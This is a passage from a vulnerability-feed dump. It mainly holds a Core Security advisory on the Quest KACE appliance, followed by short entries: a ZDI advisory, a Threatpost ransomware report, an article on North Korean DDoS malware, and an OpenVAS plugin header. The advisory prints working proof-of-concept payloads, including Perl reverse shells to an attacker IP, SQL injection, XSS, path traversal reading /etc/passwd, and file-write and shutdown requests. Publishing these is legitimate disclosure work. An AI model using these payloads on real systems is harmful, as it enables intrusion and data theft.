platform: Indicates the platform in which the agent is going to be installed\n * serv: SHA256 hash of a fixed value that depends of each appliance\n * orgid: Organization ID\n * version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.\n\nAs stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.\n\nPreparing payload:\n \n \n - platform = windows\n - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n - orgid = 1#;perl -e 'use Socket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");};';\n - version = 8.0.152 (last agent version available for windows)\n \n\nThe following proof of concept executes a reverse shell:\n \n \n GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">%26S\")%3bopen(STDOUT,\">%26S\")%3bopen(STDERR,\">%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b'%3b&version=8.0.152 HTTP/1.1\n Host: Server\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 0\n \n \n $ nc -lvp 8080\n Listening on [0.0.0.0] (family 0, port 8080)\n Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050)\n sh: can't access tty; job control turned off\n $ id\n uid=80(www) gid=80(www) groups=80(www)\n \n\n### 7.2. Authenticated command injection\n\n[[CVE-2018-11139](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11139>)] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.\n\nThe following proof of concept executes a reverse shell:\n \n \n POST /common/ajax_email_connection_test.php HTTP/1.1\n Host: [ServerIP]\n Accept: application/json, text/javascript, */*; q=0.01\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n X-Requested-With: XMLHttpRequest\n Content-Length: 416\n Cookie: [Cookie]\n Connection: close\n \n TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">%26S\")%3bopen(STDOUT,\">%26S\")%3bopen(STDERR,\">%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=[eaea@eaea.com](<mailto:eaea@eaea.com>)&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=[eaea@eaea.com](<mailto:eaea@eaea.com>)&ACTION=TEST_CONNECTION_SMTP\n \n \n $ nc -lvp 8080\n Listening on [0.0.0.0] (family 0, port 8080)\n Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050)\n sh: can't access tty; job control turned off\n $ id\n uid=80(www) gid=80(www) groups=80(www)\n \n\n### 7.3. PHP Object Injection leading to arbitrary command execution\n\n[[CVE-2018-11135](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11135>)] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.\n\nTo exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.\n\n### 7.4. Privilege escalation via password change in Sudo Server\n\n[[CVE-2018-11134](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11134>)] In order to perform actions that requires higher privileges, the application relies on a message queue managed that runs with root privileges and only allows a set of commands.\n\nOne of the available commands allows to change any user's password (including root).\n\nAssuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.\n\n### 7.5. Privilege escalation via command injection in Sudo Server\n\n[[CVE-2018-11132](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11132>)] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.\n\nA command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.\n\n### 7.6. Insufficient Authorization for critical function\n\n[[CVE-2018-11142](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11142>)] 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers.\n\nThe following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:\n \n \n POST /systemui/settings_network.php HTTP/1.1\n Host: localhost\n X-Forwarded-For: ::1\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: http://[ServerIp]/systemui/settings_network.php\n Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129\n Content-Length: 3418\n Connection: close\n Upgrade-Insecure-Requests: 1\n \n -----------------------------5642543667001619951434940129\n Content-Disposition: form-data; name=\"CSRF_TOKEN\"\n -----------------------------5642543667001619951434940129\n Content-Disposition: form-data; name=\"$shutdown\"\n DoIt!\n Content-Disposition: form-data; name=\"save\"\n Save\n -----------------------------5642543667001619951434940129--\n \n\n### 7.7. Unauthenticated SQL Injection in download_agent_installer.php\n\n[[CVE-2018-11136](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11136>)] The 'orgID' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection. In particular, a blind time based type.\n\nThe following proof of concept induces a time delay:\n \n \n http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1\n AND SLEEP(10)%23;&version=8.0.152\n \n\n### 7.8. SQL Injection in run_report.php\n\n[[CVE-2018-11140](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11140>)] The 'reportID' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection. In particular, an error based type.\n\nThe following proof of concept retrieves the current database name:\n \n \n POST /common/run_report.php HTTP/1.1\n Content-Length: 161\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Host: [ServerIP]\n Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\n Connection: close\n Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\n Upgrade-Insecure-Requests: 1\n Content-Type: application/x-www-form-urlencoded\n Cookie: [Cookie]\n \n date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf\n \n \n \n HTTP/1.1 200 OK\n Date: Thu, 08 Feb 2018 21:50:21 GMT\n Server: Apache\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\n Pragma: no-cache\n Vary: Accept-Encoding\n Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type\n Access-Control-Allow-Origin: *\n Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\n X-KACE-Appliance: K1000\n X-KACE-Host: [ServerIP]\n X-KACE-Version: 8.0.318\n X-KBOX-WebServer: [ServerIP]\n X-KBOX-Version: 8.0.318\n X-KACE-WebServer: [ServerIP]\n X-UA-Compatible: IE=9,EDGE\n Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\n Content-Length: 3548\n Connection: close\n Content-Type: text/html; charset=utf-8\n \n [...SNIPPED...]\n <script type=\"text/javascript\" src=\"/common/js/vendor/html5.js?BUILD=318\" /></script>\n <![endif]--><title>Report Queued: qppjqORG1qjpqq</title><meta http-equiv='refresh'\n [...SNIPPED...] \n\n### 7.9. Unauthenticated Cross Site Scriting in run_cross_report.php\n\n[[CVE-2018-11133](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11133>)] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.\n\nThe following proof of concept demonstrates the vulnerability:\n \n \n http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952\n \n\n### 7.10. Path traversal in download_attachment.php leading to arbitrary file read\n\n[[CVE-2018-11137](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11137>)] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.\n\nIt is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.\n \n \n http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952\n \n\nThe following proof of concept demonstrates the vulnerability:\n \n \n GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1\n Host: [ServerIP]\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Cookie: [Cookie]\n Connection: close\n Upgrade-Insecure-Requests: 1\n \n \n HTTP/1.1 200 OK\n Date: Thu, 18 Jan 2018 17:18:19 GMT\n Server: Apache\n Cache-Control: must-revalidate, post-check=0, pre-check=0\n Expires: -1\n Pragma: public\n Content-Disposition: attachment; filename=\"\"\n Content-Transfer-Encoding: Binary\n Content-Description: K1000 attachment\n Content-Length: 2400\n Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type\n Access-Control-Allow-Origin: *\n Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\n X-KACE-Appliance: K1000\n X-KACE-Host: k10000.\n X-KACE-Version: 8.0.318\n X-KBOX-WebServer: k10000.\n X-KBOX-Version: 8.0.318\n X-KACE-WebServer: k10000.\n X-UA-Compatible: IE=9,EDGE\n Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\n Connection: close\n Content-Type: application/octet-stream\n \n # $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n #\n root:*:0:0:Charlie &:/root:/bin/csh\n daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\n operator:*:2:5:System &:/:/usr/sbin/nologin\n bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\n tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n\n### 7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion\n\n[[CVE-2018-11141](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11141>)] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be at any location where the 'www' user has write permissions.\n\nFile deletion could be abused to delete '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence defines if the appliance setup wizard is shown or not.\n\nThe following proof of concept demonstrates the vulnerability:\n \n \n POST /adminui/advisory.php?ID=10 HTTP/1.1\n Host: [ServerIP]\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: http://[ServerIP]/adminui/advisory.php?ID=10\n Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100\n Content-Length: 1705\n Cookie: [Cookie]\n Connection: close\n Upgrade-Insecure-Requests: 1\n \n -----------------------------2671551246366368501556269100\n Content-Disposition: form-data; name=\"CSRF_TOKEN\"\n \n 99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n -----------------------------2671551246366368501556269100\n Content-Disposition: form-data; name=\"IMAGES_JSON\"\n \n {\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n -----------------------------2671551246366368501556269100\n Content-Disposition: form-data; name=\"FARRAY[ID]\"\n [...SNIPPED...]\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n \n \n [root@k10000 /kbox/kboxwww/resources]# ls -lha\n total 32\n drwxr-xr-x 2 www wheel 512B Feb 9 20:40 .\n drwxr-xr-x 23 root wheel 512B Nov 14 18:29 ..\n -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n \n\n## 8\\. Report Timeline\n\n * **2018-02-26: **Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form.\n * **2018-03-05: ** Quest Support confirmed the receipt and requested additional information.\n * **2018-03-12: **Core Security sent a draft advisory including a technical description.\n * **2018-03-16: ** Quest Support asked for the CVE-IDs.\n * **2018-03-16: **Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication channel also copying the researchers behind this discovery.\n * **2018-03-16: ** Quest Support thanked Core's reply and stated it will be in touch during the process.\n * **2018-03-20: ** Quest Support informed that they had not yet received any updates from the engineering team and had requested one.\n * **2018-03-21: ** Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information.\n * **2018-03-21: ** Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories.\n * **2018-03-21: ** Quest Support acknowledged the information provided.\n * **2018-03-26: ** Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise Quest would take legal action.\n * **2018-04-13: ** Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page ([https://support.quest.com/essentials/vulnerability-reporting-acknowledge...](<https://support.quest.com/essentials/vulnerability-reporting-acknowledgements>)).\n * **2018-04-16: ** Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities.\n * **2018-04-17: ** Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13).\n * **2018-04-17: ** Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. With regards to Quest's requests, Core provided the researchers names and URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process.\n * **2018-04-18: ** Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case.\n * **2018-05-31: ** Advisory CORE-2018-0004 published.\n\n## 9\\. References\n\n[1] <https://www.quest.com/products/kace-systems-management-appliance/>\n\n## 10\\. About CoreLabs\n\nCoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: <http://corelabs.coresecurity.com>.\n\n## 11\\. About Core Security\n\nCore Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity amp; access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.\n\nCore Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [info@coresecurity.com](<mailto:info@coresecurity.com>)\n\n## 12\\. Disclaimer\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>\n\n## 13\\. PGP/GPG Keys\n\nThis advisory has been signed with the GPG key of Core Security advisories team, which is available for download at <http://www.coresecurity.com/files/attachments/core_security_advisories.asc>.\n", "modified": "2018-05-22T00:00:00", "published": "2018-05-31T00:00:00", "id": "CORE-2018-0004", "href": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities", "title": "Quest KACE System Management Appliance Multiple Vulnerabilities", "type": "coresecurity", "cvss": {}}], "dsquare": [{"lastseen": "2017-09-26T15:37:35", "bulletinFamily": "exploit", "description": "File disclosure vulnerability in Schneider Electric Pelco VideoXpert /portal/ URI\n\nVulnerability Type: File Disclosure", "modified": "2017-09-10T00:00:00", "published": "2017-09-10T00:00:00", "id": "E-585", "href": "", "type": "dsquare", "title": "Schneider Electric Pelco VideoXpert File Disclosure", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdi": [{"lastseen": "2017-06-21T22:15:18", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Lepide LepideAuditor Suite. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within genratereports.php. The issue lies in the failure to properly validate a user-supplied command prior to using it in system calls. The more general flaw is that the software trusts responses from a server that is specified by a user and can be induced to execute commands from that server. An attacker can leverage this vulnerability to execute arbitrary code under the context of SYSTEM.", "modified": "2017-06-21T00:00:00", "published": "2017-06-21T00:00:00", "id": "ZDI-17-440", "href": "http://www.zerodayinitiative.com/advisories/ZDI-17-440", "title": "(0Day) Lepide LepideAuditor Suite Malicious Server Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:29", "bulletinFamily": "info", "description": "A ransomware attack that closed off access to personal and shared drives at University College London last week has been linked to a malvertising campaign spreading Mole, a variant of CryptoMix ransomware.\n\nKafeine, a white-hat who works for Proofpoint and is known for his research into exploit kits, said in a [report](<https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware>) published today that the group behind AdGholas is responsible. AdGholas are well known malvertising purveyors who have [used steganography in the past to conceal attacks](<https://threatpost.com/adgholas-malvertising-campaign-leveraged-steganography-filtering/119571/>). In this case, the attacks used the Astrum Exploit Kit to spread the malware.\n\nUniversity College London, meanwhile, said today that [all services have been returned to normal](<http://www.ucl.ac.uk/isd/news/isd-news/jun2017/ucl-wide-ransomware-attack-14062017>). As of Friday, personal storage and shared drives had been restored, and yesterday, write-access to the remaining shared drives was also restored.\n\nThe infection, the university said, was contained by last Thursday and that it was continuing to look into the root cause. Initially, officials said the attack started with a phishing email, but later reversed course and said the attack was web-based. Officials also said that services should be able to be restored from backup, sparing them the need to pay a ransom.\n\nA dozen local and shared drives were infected, and the school initially called it a \u201czero-day attack.\u201d\n\n\u201cOur antivirus software is up to date and we are working with anti-virus suppliers to pass on details of the infection so that they are aware of the incident,\u201d officials said last week. \u201cWe cannot currently confirm the ransomware that was deployed.\u201d\n\nProofpoint said AdGholas\u2019 use of ransomware in this attack is a departure from its normal tactic of spreading banking malware. Kafeine said the attack went beyond just UCL to other high-profile sites.\n\nAfter ruling out other exploit kits and ransomware based on available forensics, Proofpoint investigated the possibility of the involvement of AdGholas and its use of Astrum to spread malware. One of the IP addresses found in the attack was a Mole command and control server; some malware samples contacting this IP had been submitted to VirusTotal and were consistent with a known Astrum payload.\n\n\u201cAt that stage, we were almost convinced the events were tied to AdGholas/Astrum EK activity,\u201d Kafeine wrote. \u201cWe confirmed this, however, via an HTTPS connection common to the compromised host avia-book[.]com.\u201d\n\nThe compromised domain was used in a number of malvertising campaigns across Europe and Asia, and Kafeine said all the compromised hosts also contacted the current Astrum command and control IP address, which offers full HTTPS support, Proofpoint said.\n\n\u201cAstrum tried HTTPS between March 30 and April 4, 2017, before adopting it permanently at the end of May, Kafeine said, identifying a number of vulnerabilities exploit by the kit: CVE-2016-0189, CVE-2016-1019, and CVE-2016-4117. \u201cThe introduction of Diffie-Hellman suggests that there might be a new exploit the actors are trying to hide in this chain. Obtaining the patch state of the compromised hosts would help rule out this possibility.\u201d\n\nThe exploit kit was spreading Mole ransomware on two days, June 14 and 15, in the U.K. and United States, while continuing to spread banking malware elsewhere.\n\nMole encrypts files and demands 0.5 Bitcoin to receive a decryption key that unlocks scrambled data.\n\n\u201c[AdGholas malvertising](<https://threatpost.com/microsoft-shuts-down-zero-day-used-in-adgholas-malvertising-campaigns/120618/>) redirecting to the Astrum Exploit Kit is the most evolved blind mass infection chain known today,\u201d Kafeine wrote. \u201cFull HTTPS, heavy smart filtering, domain shadowing, Diffie-Hellman, and perfect knowledge of how the advertising industry operates allow these threat actors to lure large agencies to bring them high volumes of traffic from high-value website and targets.\u201d\n", "modified": "2017-06-20T18:27:43", "published": "2017-06-20T14:27:43", "id": "THREATPOST:804E5F87A8DDC6B4C06A66CEE9F86A32", "href": "https://threatpost.com/university-college-london-ransomware-linked-to-adgholas-malvertising-group/126405/", "type": "threatpost", "title": "UCL Ransomware Linked to AdGholas Malvertising Group", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T10:07:00", "bulletinFamily": "info", "description": "[![](https://1.bp.blogspot.com/-hkzXUb-YVK4/WUEpPWtqANI/AAAAAAAAtJM/WCJnuCuE5OEHcguz-fm_ZBsnx23blXhHACLcBGAs/s1600/north-korea-hacking-malware.png)](<https://1.bp.blogspot.com/-hkzXUb-YVK4/WUEpPWtqANI/AAAAAAAAtJM/WCJnuCuE5OEHcguz-fm_ZBsnx23blXhHACLcBGAs/s1600/north-korea-hacking-malware.png>)\n\nThe United States government has released a rare alert about an ongoing, eight-year-long North Korean state-sponsored hacking operation. \n \nThe [joint report](<https://www.us-cert.gov/ncas/alerts/TA17-164A>) from the FBI and U.S. Department of Homeland Security (DHS) provided details on \"**DeltaCharlie**,\" a malware variant used by \"**Hidden Cobra**\" hacking group to infect hundreds of thousands of computers globally as part of its DDoS botnet network. \n \nAccording to the report, the Hidden Cobra group of hackers are believed to be backed by the North Korean government and are known to launch cyber attacks against global institutions, including media organizations, aerospace and financial sectors, and critical infrastructure. \n \nWhile the US government has labeled the North Korean hacking group Hidden Cobra, it is often known as Lazarus Group and Guardians of Peace \u2013 the one allegedly [linked to the devastating WannaCry ransomware](<https://thehackernews.com/2017/05/wannacry-lazarus-north-korea.html>) menace that shut down hospitals and businesses worldwide. \n \n\n\n### DeltaCharlie \u2013 DDoS Botnet Malware\n\n \nThe agencies identified [IP addresses](<https://www.us-cert.gov/sites/default/files/publications/TA-17-164A_csv.csv>) with \"high confidence\" associated with \"DeltaCharlie\" \u2013 a DDoS tool which the DHS and FBI believe North Korea uses to launch distributed denial-of-service (DDoS) attacks against its targets. \n \nDeltaCharlie is capable of launching a variety of DDoS attacks on its targets, including [Domain Name System](<https://thehackernews.com/2014/06/dns-flood-ddos-attack-hit-video-gaming.html>) (DNS) attacks, [Network Time Protocol](<https://thehackernews.com/2014/01/Network-Time-Protocol-Reflection-DDoS-Attack-Tool.html>) (NTP) attacks, and Character Generation Protocol (CGP) attacks. \n \nThe botnet malware is capable of downloading executables on the infected systems, updating its own binaries, changing its own configuration in real-time, terminating its processes, and activating and terminating DDoS attacks. \n \nHowever, the DeltaCharlie DDoS malware is not new. \n \nDeltaCharlie was initially reported by Novetta in their 2016 Operation Blockbuster Malware Report [[PDF](<https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf>)], which described this as the third botnet malware from the North Korean hacking group, after DeltaAlpha and DeltaBravo. \n \nOther malware used by Hidden Cobra include [Destover](<https://securelist.com/destover/67985/>), Wild Positron or [Duuzer](<https://www.symantec.com/connect/blogs/duuzer-back-door-trojan-targets-south-korea-take-over-computers>), and [Hangman](<http://telussecuritylabs.com/threats/show/TSL20150910-04>) with sophisticated capabilities, including [DDoS botnets](<https://thehackernews.com/2016/11/ddos-attack-mirai-botnet.html>), keyloggers, remote access tools (RATs), and [wiper malware](<https://thehackernews.com/2013/03/south-korea-cyber-attack-wiper-malware.html>). \n \n\n\n### Hidden Cobra's Favorite Vulnerabilities\n\n \nOperating since 2009, Hidden Cobra typically targets systems running older, unsupported versions of Microsoft operating systems, and commonly exploits vulnerabilities in Adobe Flash Player to gain an initial entry point into victim's machine. \n \nThese are the known vulnerabilities affecting various applications usually exploited by Hidden Cobra: \n\n\n * Hangul Word Processor bug (CVE-2015-6585)\n * Microsoft Silverlight flaw ([CVE-2015-8651](<https://thehackernews.com/2015/12/adobe-flash-security-update.html>))\n * Adobe Flash Player 18.0.0.324 and 19.x vulnerability (CVE-2016-0034)\n * Adobe Flash Player 21.0.0.197 Vulnerability ([CVE-2016-1019](<https://thehackernews.com/2016/04/adobe-flash-update.html>))\n * Adobe Flash Player 21.0.0.226 Vulnerability ([CVE-2016-4117](<https://thehackernews.com/2016/12/image-exploit-hacking.html>))\nThe simplest way to defend against such attacks is always to keep your operating system and installed software and applications up-to-date, and protect your network assets behind a firewall. \n \nSince Adobe Flash Player is prone to many attacks and just today the company [patched nine vulnerability in Player](<https://thehackernews.com/2017/06/security-patch-tuesday.html>), you are advised to update or remove it completely from your computer. \n \nThe FBI and DHS have provided numerous indicators of compromise (IOCs), malware descriptions, network signatures, as well as host-based rules (YARA rules) in an attempt to help defenders detect activity conducted by the North Korean state-sponsored hacking group. \n\n\n> \"If users or administrators detect the custom tools indicative of HIDDEN COBRA, these tools should be immediately flagged, reported to the DHS National Cybersecurity Communications and Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and given highest priority for enhanced mitigation,\" the alert reads.\n\nBesides this, the agencies have also provided a long list of mitigations for users and network administrators, which you can follow [here](<https://www.us-cert.gov/ncas/alerts/TA17-164A>).\n", "modified": "2017-06-14T12:23:04", "published": "2017-06-14T01:23:00", "id": "THN:48EB36B9BBEE6D28A599E0C7CE3BA0C9", "href": "https://thehackernews.com/2017/06/north-korea-hacking-malware.html", "type": "thn", "title": "US Warns of 'DeltaCharlie' \u2013 A North Korean DDoS Botnet Malware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-10-22T16:35:49", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2017-03-18T00:00:00", "id": "OPENVAS:1361412562310810668", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810668", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Linux", "type": "openvas", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_within_chrome_apsb16-10_lin.nasl 11874 2018-10-12 11:28:04Z mmartin $\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Linux\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with 